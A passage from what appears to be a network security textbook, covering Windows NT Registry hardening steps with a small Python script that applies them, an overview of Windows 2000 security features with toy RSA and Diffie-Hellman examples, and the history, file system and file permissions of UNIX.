Logon Banner
By modifying certain Registry keys, it is possible to change the Windows NT logon process so that pressing Ctrl+Alt+Del produces a logon banner. This banner is a dialog box that can be used to display a legal notice or system usage policy. Before users can authenticate to the system, they must click OK or press Enter to make the actual logon screen appear.

To add a logon banner, launch regedt32 and find the key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Within this key you will find two key values, one named LegalNoticeCaption and the other named LegalNoticeText. Click either of these two objects in order to modify its value. The LegalNoticeCaption value is the text that will appear in the title area of the dialog box. The LegalNoticeText value is the actual text that will appear within the dialog box itself. Once you have made your changes, exit regedt32 and reboot the system.

Hiding the Last Logon Name
As a convenience, Windows NT retains the logon name of the last user to log on to the system locally.
This allows the system to fill in the logon name field the next time someone attempts to authenticate to the system by pressing Ctrl+Alt+Del. In a high-security environment, this may not be considered acceptable, because it can provide anyone passing by the system with a valid logon name.

In order to prevent Windows NT from presenting the name of the last user to log on to the system, find the following Registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Highlight the Winlogon key and select Edit > Add Value from the Registry Editor menu. When the Add Value window appears, add a value name of DontDisplayLastUserName with a data type of REG_SZ. When you click the OK button, the String Editor window will appear. Enter a string value of 1.

Once you have entered the string value, click OK, and exit the regedt32 utility. You will need to reboot the system before the changes will take effect.

Securing the Registry on Windows NT Workstation
You can edit the Registry on a Windows NT system across the network, as well as from the local machine. On a Windows NT Server, remote Registry access is restricted to administrator-level accounts. On a Windows NT Workstation, however, no such restriction exists.

In order to restrict Registry access to administrators on NT Workstation, find the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers

You will first need to create a key named winreg beneath this object. This is performed by highlighting SecurePipeServers and selecting Edit > Add Key from the Registry Editor menu. Once this key has been created, you should highlight it and select Edit > Add Value from the Registry Editor menu. When the Add Value window appears, add a value name of Description with a data type of REG_SZ. When you click the OK button, the String Editor window will appear. Enter a string value of Registry Server. Remote Registry access is then governed by the permissions assigned to the winreg key itself, so make sure they grant access to administrators only.

Once you have made these changes, exit the regedt32 utility. You will need to reboot the workstation before the changes will take effect.

Securing Access to Event Viewer
By default, Windows NT allows guests and null users access to entries in the Event Viewer System and Application logs. This information can be used by an attacker in order to identify further vulnerabilities on the system. The Security log is exempt from this setting because access to it is controlled by the Manage Audit Log settings in User Manager. To ensure that the System and Application logs are accessed only by administrator-level accounts, find the following keys:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System

Highlight the Application key and select Edit > Add Value from the Registry Editor menu. When the Add Value window appears, type in a value name of RestrictGuestAccess with a data type of REG_DWORD. When you click the OK button, the String Editor window will appear. Enter a string value of 1. Once you have entered the string value, click OK and highlight the System key. Repeat these steps for the System key, as well.

Cleaning the Page File
The page file is the area of the hard disk used by Windows NT as virtual memory.
As part of memory management, Windows NT will move inactive information from physical memory to the page file so that more physical memory is available for active programs. When the Windows NT system is shut down, there is no guarantee that this information will be completely removed. Thus an attacker who is able to boot the system to an alternate operating system may be able to read information that was stored in this file.

To ensure that the contents of the page file are purged during shutdown, locate the following key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Highlight the Memory Management key and select Edit > Add Value from the Registry Editor menu. When the Add Value window appears, type in a value name of ClearPageFileAtShutdown with a data type of REG_DWORD. When you click the OK button, the String Editor window will appear. Enter a string value of 1. Once you have entered the string value, click OK, and exit the regedt32 utility.

Note
The system will require two reboots before the page file is wiped.
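The last few changes all follow the same Add Value pattern, which makes them easy to apply from a script when you have more than a handful of systems to harden. The sketch below, a convenience wrapper around the manual steps above rather than a replacement for understanding them, sets the last-logon, Event Viewer, and page-file values using Python's winreg module; it needs administrative rights, and the usual reboots still apply.

# nt_hardening.py -- apply several of the Registry changes described above.
# Requires administrative rights; reboot for the changes to take effect.
import winreg

CHANGES = [
    # (subkey under HKEY_LOCAL_MACHINE, value name, value type, data)
    (r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "DontDisplayLastUserName", winreg.REG_SZ, "1"),
    (r"System\CurrentControlSet\Services\EventLog\Application",
     "RestrictGuestAccess", winreg.REG_DWORD, 1),
    (r"System\CurrentControlSet\Services\EventLog\System",
     "RestrictGuestAccess", winreg.REG_DWORD, 1),
    (r"System\CurrentControlSet\Control\Session Manager\Memory Management",
     "ClearPageFileAtShutdown", winreg.REG_DWORD, 1),
]

for subkey, name, value_type, data in CHANGES:
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey, 0,
                         winreg.KEY_SET_VALUE)
    winreg.SetValueEx(key, name, 0, value_type, data)
    winreg.CloseKey(key)
    print("set", subkey + "\\" + name)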
Windows 2000
Windows 2000 includes many new security features, including
• Active Directory, which is designed to replace the flat security structure of the current domain architecture
• Encrypting File System
• Kerberos version 5
• Public key certificate services
• IPSec support
• Support for smart cards

Active Directory
While NT 4.0 provided a flat, non-extensible directory service, Active Directory provides a very flexible, hierarchical, and expandable directory service.

There are three ways of looking at Active Directory:

As a Store Active Directory stores information about network objects hierarchically, and makes this information available to users, applications, and services.

As a Structure All network objects and services are stored as objects within Active Directory. Constructs such as domains, trees, forests, trust relationships, organizational units, and sites are included.

As a Team Player Active Directory uses standard directory access protocols and can communicate with other directory services and applications.

Other features of Active Directory include the following:

DNS integration All Active Directory services utilize DNS to advertise, locate, and connect to all network services.

Extensibility The schema (or structure) of Active Directory is extensible, meaning that new classes of objects and new attributes of existing classes can be added by administrators or applications.

Object-based policies Also known as Group Policies, these settings determine user access to resources and how these resources can be used.

Scalability Active Directory uses one or more domains, each with one or more domain controllers. Multiple domains can be combined into a domain tree, and multiple domain trees can be combined into a forest. A single-domain network is still a single tree and single forest.

Multimaster replication All domain controllers are created equal in the sense that a change to the directory can occur on any domain controller, which in turn updates all the other domain controllers. If one domain controller fails, the others can take over its load.

Centralized security AD authorizes each user's access to the network. In addition, access control can be defined not only on each object in the directory, but also on each property of each object.

Interoperability LDAP (Lightweight Directory Access Protocol) allows AD to share object information with applications and other directory services.

Encrypting File System (EFS)
In NT 4.0, user access to files is controlled by Access Control Lists (ACLs). But what if physical control of a computer system is lost? What happens if a laptop is stolen? There are many tools available to a hacker that would permit booting the machine into a different operating system that doesn't respect ACLs, so sensitive information could be read.

To overcome this problem, Microsoft integrated the Encrypting File System (EFS) into Windows 2000. EFS is based on public-key encryption, taking advantage of the CryptoAPI architecture in Windows. Each file is encrypted using a randomly generated key, called the file encryption key. File encryption uses symmetric encryption algorithms, but future releases will allow other schemes.

EFS is integrated with the NT File System (NTFS). When temporary files are created, the attributes from the original file may be copied to the temporary files, as long as all files are on an NTFS volume. If the original file is encrypted, EFS encrypts its temporary copies when attributes are transferred during file creation. EFS resides in the Windows 2000 kernel and uses the non-paged pool to store file encryption keys, ensuring that they never make it to the paging file.

Other characteristics of EFS include:

User interaction By default, no administrator action is necessary to enable encryption. Encryption and decryption are handled transparently on a per-file or per-directory basis.

Data recovery W2K allows EFS only when the system is configured with one or more recovery keys. Data recovery is intended for business environments where the organization expects to be able to recover data encrypted by an employee after the employee leaves or when encryption keys are lost.

Command line The Cipher utility lets users encrypt and decrypt files and folders from a command line (or an administrative script).

Kerberos Version 5
Prior to W2K, Microsoft relied on the NTLM protocol for user authentication. Starting with W2K, Microsoft has integrated an open, industry-standard protocol developed at MIT, called Kerberos. Now in its fifth version, Kerberos is a mature and robust protocol that provides many advantages over NTLM, including:

More efficient authentication to servers With NTLM, an application server must connect to a domain controller in order to authenticate each client. With Kerberos, the server authenticates the client by examining credentials presented by the client. Credentials are reusable throughout the entire session.

Mutual authentication NTLM allows servers to verify the identities of their clients. It does not allow clients to verify a server's identity, or one server to verify the identity of another. Kerberos assumes nothing—parties at both ends of a connection can know that the party on the other end is who it claims to be.

Delegated authentication Windows services impersonate clients when accessing resources on their behalf. Some distributed applications are designed so that a front-end service must impersonate clients.
The Kerberos protocol has a proxy mechanism that allows a service to impersonate its client when connecting to other services. No equivalent is available with NTLM.

Simplified trust management One of the benefits of Kerberos is that trust between the security authorities for Windows 2000 domains is two-way and transitive (by default). Credentials issued by the security authority for any domain are accepted everywhere in the tree.

Interoperability Microsoft follows the Kerberos standards as specified by the Internet Engineering Task Force (IETF), which allows W2K to play nice with other networks using Kerberos for authentication.

Public Key Certificate Services
Prior to W2K, encryption was implemented in a fragmented and isolated fashion. With the growth of the Internet and of distributed, interoperating networking systems, authenticating the participants of a data session and then encrypting the subsequent session have become minimum standards of data processing.

Public-key cryptography provides three capabilities that are critical for modern networks:

Privacy Encrypting all network communication, including e-mail, voice, and instant messaging.

Authentication Verifying the identity of all participants of a session—for the full duration of the session.

Non-repudiation Creating a binding record of all transactions performed by all parties during a session.

Traditional cryptography relies on secret keys, wherein two parties share a single secret key that is used to both encrypt and decrypt data. Loss or compromise of the secret key makes the data it encrypts vulnerable. Public-key systems, on the other hand, use two keys: a public key that is shared, and a private key that is closely held. These keys are complementary in the sense that if you encrypt something with the public key, it can only be decrypted with the corresponding private key, and vice versa.

For example, if Bob wants to send Alice some private data, he uses her public key to encrypt it, then sends it to her. Upon receiving the encrypted data, Alice uses her private key to decrypt it. The important concept here is that Alice can freely distribute her public key in order to allow anyone in the world to encrypt data that only she can decrypt. If Bob and Chuck both have copies of her public key, and Chuck intercepts an encrypted message from Bob to Alice, he will not be able to decrypt it; only Alice's private key can do that, and she is the only person who holds it.

The previous example takes care of privacy, but what about authentication and non-repudiation? For this we turn to the concept of signing. Signing also uses encryption, but the goal is to prove the origin of the data. If Alice wants the world to know that she is the author of a message, she encrypts it using her private key and posts the message publicly. The only way this message can be decrypted is to use Alice's freely available public key—thus verifying the source of the message as Alice.

Used together, encryption and signing provide for privacy, authentication, and non-repudiation.
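The complementary-key arithmetic is easy to watch in miniature. The sketch below walks through the classic textbook RSA example, with numbers hopelessly small for real use, to show both operations just described: Bob encrypting with Alice's public key, and Alice signing with her private key.

# toy_rsa.py -- public-key encryption and signing with textbook-sized numbers.
# These primes are far too small for real use; they only illustrate the math.
p, q = 61, 53
n = p * q        # 3233, the modulus shared by both keys
e = 17           # Alice's public exponent
d = 2753         # Alice's private exponent: (e * d) mod ((p-1)*(q-1)) == 1

message = 65     # the data, encoded as a number smaller than n

# Privacy: Bob encrypts with Alice's public key (e, n) ...
ciphertext = pow(message, e, n)
# ... and only Alice's private key (d, n) can reverse it.
assert pow(ciphertext, d, n) == message

# Signing: Alice encrypts with her private key ...
signature = pow(message, d, n)
# ... and anyone holding her public key can verify the origin.
assert pow(signature, e, n) == message

print("ciphertext:", ciphertext, "signature:", signature)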
The framework that provides these services is known as Public Key Infrastructure (PKI). PKI is the operating system and services that make it easy to implement and manage public keys, and it provides features including:

Key Management PKI makes it easy to issue, review, and revoke keys, as well as manage the trust level attached to keys.

Publish Keys PKI offers an easy way for users to locate and retrieve public keys (including determining whether they are valid or not).

Use Keys PKI provides integration with third-party applications to easily select which combination of services (encryption and signing) to perform.

While public keys are the objects that PKI uses (private keys are always stored privately), they are usually packaged as digital certificates. The certificate contains the public key and a set of identifying details, like the key-holder's name. The binding between attributes and the public key holds because the certificate is digitally signed by the entity that issues it; the issuer's signature on the certificate vouches for its authenticity and correctness.

The problem is, of course, in determining the validity of the entity that issues a certificate in the first place. The answer lies in the concept of a certificate hierarchy. In a hierarchy, each issuer (known as a certificate authority) signs each certificate that it issues with its private key. The public half of the CA's key pair is itself packaged in a certificate—one that was issued by a higher-level CA. This pattern can continue through as many levels as needed, but eventually there must be a top-level CA. This CA, known as the root certificate authority, signs its own certificate. Obviously, an end user has to trust that the root certificate is who it says it is.

Well-known commercial CAs like Thawte and Verisign issue certificates to millions of users. W2K includes its own PKI, which can be used to issue certificates but also provides services to manage and use them. The primary components of W2K PKI are:

Certificate Services This central PKI service allows organizations to act as their own CAs, giving them the ability to issue and manage digital certificates.

Active Directory As a directory service, AD serves as the publication service for PKI.

PKI-enabled applications Internet Explorer, Microsoft Money, Internet Information Server, Outlook, and Outlook Express, as well as many other third-party applications, can use W2K PKI.

Exchange Key Management Service (KMS) This component of Microsoft Exchange archives and retrieves keys used to encrypt and sign e-mail.

Microsoft has made an effort to follow open PKI standards. Some of these are shown in Table 14.4:

Table 14.4: PKI Standards Supported by W2K

Standard       What It Does
X.509          Controls format and content of digital certificates
CRL ver. 2     Controls format and content of certificate revocation lists
PKCS family    Controls format and behavior for public-key exchange and distribution
SSL ver. 3     Provides encryption for Web sessions
SGC            Provides SSL-like security without export complications
IPSec          Provides encryption for network sessions using IP
PKINIT         Is the emerging standard for using public keys to log on to networks that use Kerberos
PC/SC          Is a smart card standard

IPSec
NT 4.0 did not provide robust and routine network data encryption—a critical weakness in today's environment of mixed networks and global information exchange.
W2K includes the IP Security Protocol (IPSec), which ensures that data traffic is safe on two basic levels:

Modification Data is protected en route.

Interception Data cannot be viewed or copied en route.

IPSec is an open standard designed by the IETF for IP, and it supports network-level authentication, data integrity, and encryption. Because IPSec in W2K is deployed below the transport level of the OSI model, application-specific configuration is no longer necessary. This also dramatically simplifies VPNs. Additional IPSec services provided by W2K include:

Data integrity IP authentication headers ensure data integrity during communications.

Dynamic rekeying Regenerating keys at variable intervals during a session dramatically improves protection against attacks.

Centralized management W2K administrators can set security policies and filters to define granular security based on user, work group, or other criteria.

Flexibility IPSec policies can be applied to a single workstation, user, group, or enterprise-wide data communications.

IPSec provides for privacy, authentication, and non-repudiation by using an authentication header (AH) and an encapsulated security payload (ESP). The AH provides source authentication and integrity. The ESP provides confidentiality (along with authentication and integrity). With IPSec, only the sender and the recipient know the security key. If the authentication data is valid, the receiver knows that the data comes from the purported sender and has not been altered in transit.

Microsoft has included these industry-standard technologies in their implementation of IPSec:

Diffie-Hellman The preferred method of sharing keys, Diffie-Hellman starts with the two participants exchanging public information. Then each entity combines the other's public information with its own secret information to generate a shared secret value. (A toy example of this exchange follows at the end of this section.)

Hash Message Authentication Code (HMAC) Used to verify data integrity, HMAC produces a digital signature for each packet. If the contents of the packet change in transit, the signature the receiver calculates will not match the one that was sent, and the packet is discarded.

Data Encryption Standard (DES) Used to enforce confidentiality, DES is a secret-key algorithm that is applied in cipher block chaining (CBC) mode, in which each block of data is combined with the previous block before being encrypted under the secret key.

Other security protocols that support IPSec in W2K are:

Internet Security Association and Key Management Protocol (ISAKMP) This protocol defines a common framework to support the establishment of security associations (SAs). An SA is a set of parameters that define the mechanisms (such as keys) for secure communication between two computers.

Oakley Key Determination Oakley uses Perfect Forward Secrecy (PFS) to make sure that only data directly encrypted by a key can be compromised if the key encryption is broken. It never reuses a key to compute additional keys and never uses the original key-generation material to compute another key.

Because IPSec has been integrated into W2K, it can take advantage of W2K's PKI services, including AD, Group Policies, and Certificate Services. This provides a powerful security advantage to W2K—allowing centralized management of all security services.
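As promised above, here is the Diffie-Hellman exchange in miniature. The sketch uses toy numbers (a real exchange uses a prime hundreds of digits long) to show how both sides reach the same shared secret while only the public values ever cross the wire.

# toy_dh.py -- Diffie-Hellman key exchange with toy numbers.
# p and g are public; real exchanges use a prime hundreds of digits long.
p, g = 23, 5

a = 6                       # Alice's secret value, never transmitted
b = 15                      # Bob's secret value, never transmitted

A = pow(g, a, p)            # Alice sends 8 across the wire
B = pow(g, b, p)            # Bob sends 19 across the wire

# Each side combines the other's public value with its own secret ...
alice_secret = pow(B, a, p)
bob_secret = pow(A, b, p)

# ... and both arrive at the same shared secret (2) without sending it.
assert alice_secret == bob_secret
print("shared secret:", alice_secret)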
Smart Cards
NT 4.0 user authentication methods were limited to passwords, unless third-party products were installed. Passwords present numerous problems, including management overhead and personnel issues (users setting weak or easily guessed passwords, or frustration with high password turnover). The security industry as a whole has turned to more secure and easily managed ways of verifying identity. One of the most popular of these methods, striking a balance between cost and functionality, is the smart card.

A smart card is a credit card–sized device that uses an integrated circuit to store information, including certificates, private keys, and any other personal information. Smart cards are used to gain access to computer systems equipped with smart card readers. Typically, a user will swipe (or insert) the smart card through a smart card reader and is then prompted to enter some additional unique and private information, such as a PIN (Personal Identification Number)—similar to the concept of an ATM card. Smart cards, however, store their information not on an unencrypted magnetic stripe, but in an encrypted format on the integrated circuit.

Smart cards are very attractive from a security perspective because they enhance software-only solutions such as client authentication, logon, and secure e-mail. Smart cards sit at the center of several PKI functions because they
• Provide tamper-resistant storage for protecting private keys along with personal information.
• Isolate sensitive security operations (such as authentication, digital signatures, and key exchanges) from other parts of the system that do not have a need to know.
• Provide portability of credentials and private information between computers at any geographical location (work, home, on the road, etc.).

Traditionally, smart cards have had limited success because of non-standardization. The International Standards Organization (ISO) developed ISO 7816 in an attempt to centralize smart card development. In 1996, Europay, MasterCard, and VISA (EMV) defined a specification that adopted the ISO 7816 standards and added others to support the financial services industry. The European telecommunications industry split the standards process by creating its own variant of ISO 7816 for its Global System for Mobile Communications (GSM) specification, to enable identification and authentication of mobile phone users.

None of these specifications met the needs of the computer industry, so in 1997 the PC/SC (Personal Computer/Smart Card) Workgroup (formed by several industry leaders, including Microsoft) released the PC/SC specifications. Also based on ISO 7816, these standards address issues relating directly to information systems. Microsoft implemented the standards using the following technology:

CryptoAPI This component allows any Smart Card Service Provider (SCSP) to take advantage of the cryptographic features integrated into W2K, without having to know cryptography.

SCard COM A noncryptographic interface, SCard COM allows applications to gain access to generic smart card services.

Because of their integration with W2K services, smart cards can be used as the primary contributor to the PKI of an organization, simultaneously providing a high degree of management and risk-avoidance.
Summary

In this chapter we discussed how to go about securing an NT server environment. You saw how to manage user accounts, as well as how to set file permissions. We also discussed the importance of installing security patches. Finally, we looked at the new technologies included with Windows 2000 that provide a very powerful, centrally managed infrastructure for network security.

In the next chapter, we will discuss how to secure a UNIX system. Since many environments still use UNIX for mission-critical applications, the operating system is a strategic component of many networking environments.

Chapter 15: UNIX

In order to secure a system running UNIX, you must have a firm handle on how the operating system works. While most UNIX systems come with some type of GUI, these usually won't walk you through the process, nor are there extensive Help buttons to click that will describe a particular setting and when it should be used. UNIX systems are predominantly managed from the command line, although some utilities have been ported to X-Windows. This makes securing a UNIX system extremely difficult for those who are not versed in the operating system.

The reward for learning UNIX is the ability to manage a system that still controls a majority of the world's critical data. While UNIX has lost market share in smaller markets, it is still the major player in supporting mission-critical applications. It also has the ability to become an extremely secure application server. For example, while an NT server running Internet Information Server (IIS) requires that the RPC port (135) and all NetBIOS ports (137–139) be left open and vulnerable, a UNIX system running Apache only requires you to open the ports on which you actually want to offer services (such as port 80 for Web). With fewer open ports, it is less likely an attacker will find an entry point into your system.

UNIX History

Developed in 1969 at Bell Labs, UNIX is by far the oldest distributed NOS in use today. Its creation is credited to Ken Thompson, who was working at that time for Bell Labs on the Multiplexed Information and Computing Service (MULTICS) for a General Electric mainframe. Bell Labs eventually dropped the project, and with it went a very important piece of software: a game called Space Travel.

It is rumored that Thompson set out to create a new operating system to which the game could be ported. MULTICS assembly code was rewritten for an available DEC PDP-7, and the new operating system was named UNICS.

Bell Labs eventually took interest in UNICS as additional functionality beyond the game Space Travel was added, which gave the operating system some commercial appeal. By 1972, it was named UNIX and had an install base of 10 computers. In 1973, Thompson and Dennis Ritchie rewrote the kernel in C, making the operating system much more portable.

In 1974, the IP protocol was first specified, and it was later integrated into the UNIX operating system. No longer were multiple terminals required to access a single UNIX system. A shared medium called Ethernet could be used to access the system. UNIX had become a true NOS.

In the mid-'70s Bell Labs started releasing UNIX to universities. Since Ma Bell was still regulated at the time, it was not allowed to profit from UNIX's sales.
For this reason, only a minimal fee was charged for the UNIX source code, which helped to make it widely available.

Once UNIX hit the universities, its development expanded from the injection of fresh blood. Students began improving the code and adding features. So dramatic were these changes at the University of California at Berkeley that the university began distributing its own flavor of UNIX: the Berkeley Software Distribution (BSD). The UNIX version that continued to be developed by Bell Labs is known as System V (pronounced "five").

Because UNIX could meet so many needs (and could run on so many platforms), many versions proliferated in the early 1980s. AT&T contributed to this diversity because of its licensing policy at the time; it retained the UNIX name, allowing any other distributor to name their own version of UNIX—with results like Solaris (Sun) and HP-UX (Hewlett-Packard). Even Microsoft released a version of UNIX, called XENIX.

Finally, in 1987, AT&T, along with Sun Microsystems and Microsoft, agreed to combine the major versions of UNIX into a single distribution. Called System V Release 4 (abbreviated to SVR4), this version combined the best features of XENIX, BSD, and System V Release 3—and as a result became a de facto standard well into the 1990s. In 1993, six other vendors—Hewlett-Packard, IBM, SCO (The Santa Cruz Operation), SunSoft, Univel, and UNIX System Laboratories—created a standard called COSE (Common Open Software Environment). That same year, AT&T sold UNIX to Novell, which in turn sold it to SCO in 1995. Despite these repeated (and occasionally successful) efforts to standardize UNIX, it remains a fragmented, but respected, operating system.

The beginning of the 1990s saw another trend—non-commercial clones of the UNIX operating system, most notably FreeBSD and Linux.

FreeBSD

FreeBSD was born from a tumultuous legal battle involving Novell and U.C. Berkeley in the early 1990s. Originally developed as a patch for an existing i386 version of BSD, then re-created from the bits of the 4.4BSD-Lite2 version of UNIX remaining after the settlement of the lawsuit between Novell and U.C. Berkeley, FreeBSD has used a controlled development model to create an exceptionally stable (and secure) but free operating system.

So how does FreeBSD differ from Linux, given that both employ an open model for their source code and price? For starters, FreeBSD is not dependent on any one person—unlike Linux, which is ultimately controlled by Linus Torvalds. And because FreeBSD inherited so much technology from an earlier, mature version of UNIX (BSD), its networking traditionally has been much more robust and has performed better than Linux's (although that is rapidly changing). A third reason is that Linux takes after the other main family of UNIX, SVR4, in terms of file system layout, boot process, and executable standard. And finally, there is the issue of licensing: while Linux depends on the GNU "copyleft" license (which severely limits the commercial advantages of investing in Linux development), FreeBSD has its own license, which permits much more commercial investment.

In the end, the decision to run FreeBSD over Linux (or even a mainstream version of UNIX) comes down largely to personal preference.
One negative: FreeBSD does not support the same extensive range of hardware (such as obscure video cards) that Linux does. However, FreeBSD is dramatically easier to update and maintain "in sync" with the latest releases. Some organizations (such as Yahoo!) have decided to overcome the quandary by installing both, taking advantage of the numerous similarities as opposed to the few differences.

Linux

There is a myth (and it is only a myth) that Linux was created to compete against Microsoft. The truth, however, is much more humble, and, to make a play on an old saying—dissatisfaction is the mother of invention.

In 1991, Linus Torvalds, a student at the University of Helsinki in Finland, was frustrated with his choice of operating systems that would run on the Intel 386 processor. Not inclined to DOS, and unable to afford the more expensive UNIX versions, he decided to create his own UNIX clone, basing it on Minix, a very limited UNIX-like system for PC hardware. Linus then made two decisions that set the stage for the entire culture of open development that has grown with the OS itself: he released (and publicized) the source code on the Internet, and he asked for volunteers to help him further develop the OS.

Linus had two assets that immediately gave his new OS life: an FTP site at the University of Helsinki (where anyone could download the latest—and previous—versions), and a variety of experienced volunteers who added device drivers, compilers, and code libraries. These elements formed a cohesive whole that allowed anyone to download a relatively complete operating system (albeit, initially, one without a full feature set).

Over time, the open source efforts have given Linux a full range of capabilities that are required for the success of any NOS—multitasking, memory management, and especially, networking. The open approach to software (with critical changes to the kernel still controlled by Torvalds) has created some hesitation in the business community (although it wholly embraces the fact that Linux is technically free of purchasing or licensing costs), simply because there is no single organization that ensures the commercial orientation or release timeline of traditional operating systems.

However, in spite of reservations that Linux might suffer the same "fragmentation" UNIX did, the past few years have seen dramatic growth in the number of corporations adopting Linux for core business applications, not just for peripheral network services like DNS, DHCP, and HTTP. Combined with its broad hardware and platform support, Linux has gained significant commercial backing. This includes a $1.15 billion investment in Linux by IBM (which, along with Compaq and Dell, offers Linux pre-installed on its flagship server products) and major application vendors (including Oracle and Informix) porting their products to the Linux platform.

UNIX File System

Most UNIX operating systems use POSIX-compliant file systems that accept filenames of up to 254 characters. Names are case sensitive, so Myfile.txt and myfile.txt would be considered two separate files. These file systems are high-performance designs that help to reduce the amount of file fragmentation.

UNIX uses mount points instead of drive letters when disks are added. A mount point is simply a point in the directory structure where the storage of the new disk is attached. This provides a cleaner feel to the file structure and helps to consolidate information.
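In practice, attaching a new disk is a matter of creating a file system on it and mounting it at the chosen directory. A minimal sketch (the device name /dev/hdb1 is an assumption; it varies by platform and disk type):

# create a file system on the second drive's first partition
mkfs /dev/hdb1
# attach that storage to the directory tree at /home
mount /dev/hdb1 /home

On most systems, adding a matching line to /etc/fstab makes the arrangement permanent, so the disk is reattached automatically at boot time:

/dev/hdb1   /home   ext2   defaults   1 2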
\n" }, { "page_number": 311, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 311\nFor example, let’s assume that you are setting up a UNIX machine and that you have two physical hard drives that \nyou wish to use. You want to dedicate the first drive to the operating system, while utilizing the second drive for \nyour users’ home directories. \nInstead of installing the OS on C: and putting the users’ home directories on D:, you would simply assign the \nsecond drive for storage of all files under the /home directory. This would store all files on the primary drive, \nexcept for those located under the home directory. \nThere are a few benefits to this. First, it allows the addition of extra drives to be transparent. If you are looking for \na file and have no idea where it is located, you can simply go to the root and perform a single search. You are not \nrequired to repeat the search for each additional drive, because they have been woven into the fabric of the \ndirectory structure. \nUsing mount points also helps to reduce system-wide failures due to a crashed drive. For example, if your second \ndisk were to fail, you would lose only the users’ home directories, not the entire system. This is in contrast to \nNetWare, which requires you to span the entire volume structure over both disks. If one of those drives fails, none \nof the files on the volume can be accessed. \nUnderstanding UID and GID \nUNIX uses two numbers as part of associating file permissions with their correct user and group. The User ID \n(UID) is a unique number assigned to each logon name on a system. The Group ID (GID) is used to uniquely \nidentify each group. When a file is saved to the system, the user’s UID and GID are saved along with it. This \nallows the UNIX system to enforce access restrictions to the file. For example, if your UID is 501, this \ninformation is recorded with every file you write to the system so that you can be properly identified as the file’s \nowner. \nTwo files are used to store the UID and GID information. These are \npasswd Identifies the UID for each user and the GID of the user’s primary group \ngroup Identifies the GID for each group and lists secondary groups for each user \nWe will discuss the passwd (password) file and the group file in greater detail later in this chapter. For now, just \nbe aware that every user is associated with a unique UID and that every group is associated with a unique GID. \nFile Permissions \nIf UNIX has one major security weakness, it is its file permission settings. Permissions are set by three distinctive \nclasses—owner, group, and everyone. I can set specific permissions for when I access a file, for when anyone in \nmy group accesses a file, or for when anyone else on the system accesses the file. Permission settings are limited \nto read, write, and execute. UNIX does not support some of the more granular permission settings such as change, \nmodify, and delete. \nFor example, let’s assume you have a file called serverpasswords.txt in your home directory (a bad idea, I know, \nbut this is only an example). Let’s also assume that you are part of a group called admin. You can set permissions \non this file so that you can read and write to it, members of the admin group have read-only access, and everyone \nelse on the system has no access. \nThere are a few problems with this setup. 
First of all, even though "everyone else" has no access, they will still see that the file exists unless you remove all read permissions for the entire directory. Seeing a file may prompt others to take further steps and try to access the file, now that they know it is there. While removing all access to a directory may be acceptable in some cases, it may not be possible to do this in every situation, such as when you're working with shared file areas.

Another problem is that permissions are too general. You cannot say, "Give read and write access for this file to Sean and Deb from the admin group, but give all other members read-only access." UNIX was spawned in a much simpler time, when complicated file access was not required. In fact, for many years the focus was on making system access easier, not more difficult.

Note The administrator account called root always has full access to all system files. This attribute cannot be removed.

Viewing File Permissions

You can get a listing of directory files by using the ls (list) command. When combined with the -l (long) switch, file permission information is displayed. It is also useful to include the -a (all) switch, as this will show hidden files, as well. A sample output from the ls command is as follows:

[granite:~]$ ls -al
drwx------ 3 cbrenton user 512 Aug 25 18:15 .
drwxr-xr-x 5400 root wheel 95744 Aug 28 17:01 ..
-rw-r--r-- 1 cbrenton user 0 Oct 31 1997 .addressbook
-rw-r--r-- 1 cbrenton user 1088 May 6 1997 .cshrc
-rw-r--r-- 1 cbrenton user 258 May 6 1997 .login
-rw-r--r-- 1 cbrenton user 176 May 6 1997 .mailrc
-rw------- 1 cbrenton user 7881 Aug 25 18:15 .pine-debug1
-rw------- 1 cbrenton user 8410 Aug 25 16:30 .pine-debug2
-rw------- 1 cbrenton user 7942 Aug 25 15:08 .pine-debug3
-rw------- 1 cbrenton user 8605 Aug 25 14:49 .pine-debug4
-rw-r--r-- 1 cbrenton user 11796 Aug 25 18:15 .pinerc
-rw-r--r-- 1 cbrenton user 1824 May 6 1997 .profile
-rw-r--r-- 1 cbrenton user 52 May 6 1997 .profile.locale
-rw-r--r-- 1 cbrenton user 749 May 6 1997 .shellrc
-rw------- 1 cbrenton user 2035 Jul 13 14:33 dead.letter
drwx------ 2 cbrenton user 512 Aug 25 16:29 mail

The first column holds permission information. It is a string of 10 characters that describes the type of entry, as well as the permissions assigned to the entry. Any entry beginning with a dash (-) is identified as a regular file. Table 15.1 contains a list of valid first characters and the type of entry each describes.

Table 15.1: UNIX File Types

First Character    Entry Description
-                  Regular file
d                  Directory entry
l                  Symbolic link to a file located in another directory
b                  Block device (used for accessing peripherals such as tape drives)
c                  Character device (used for accessing peripherals such as terminals)

The remaining nine characters are broken up into three groups of three characters each. The first group of three describes the permissions assigned to the file's owner. In the sample directory listing, all of the files are owned by the user cbrenton. The second group of three characters describes the permissions assigned to the file owner's group. In the sample directory listing, cbrenton is a part of the group user; therefore the second group of permissions is applied to that group.
Finally, the third group of three characters describes the permissions granted to everyone else with a valid logon account to the system. Table 15.2 describes the possible permissions.

Table 15.2: UNIX Permission Settings

Character Entry    Description
r                  Entry can be viewed or accessed in read-only mode.
w                  Entry can be modified or deleted. If assigned to a directory, new files can be created, as well.
x                  If the entry is a file, it can be executed. If the entry is a directory, it can be searched.

For example, the file .login in the sample output would be interpreted as follows:

• This is a regular file (- is the first character).
• The owner of the file can read it (r is the second character).
• The owner of the file can write to it (w is the third character).
• The owner of the file cannot execute it (x is not the fourth character).
• The owner's group can read it (r is the fifth character).
• The owner's group cannot write to it (w is not the sixth character).
• The owner's group cannot execute it (x is not the seventh character).
• Everyone else can read it (r is the eighth character).
• Everyone else cannot write to it (w is not the ninth character).
• Everyone else cannot execute it (x is not the tenth character).

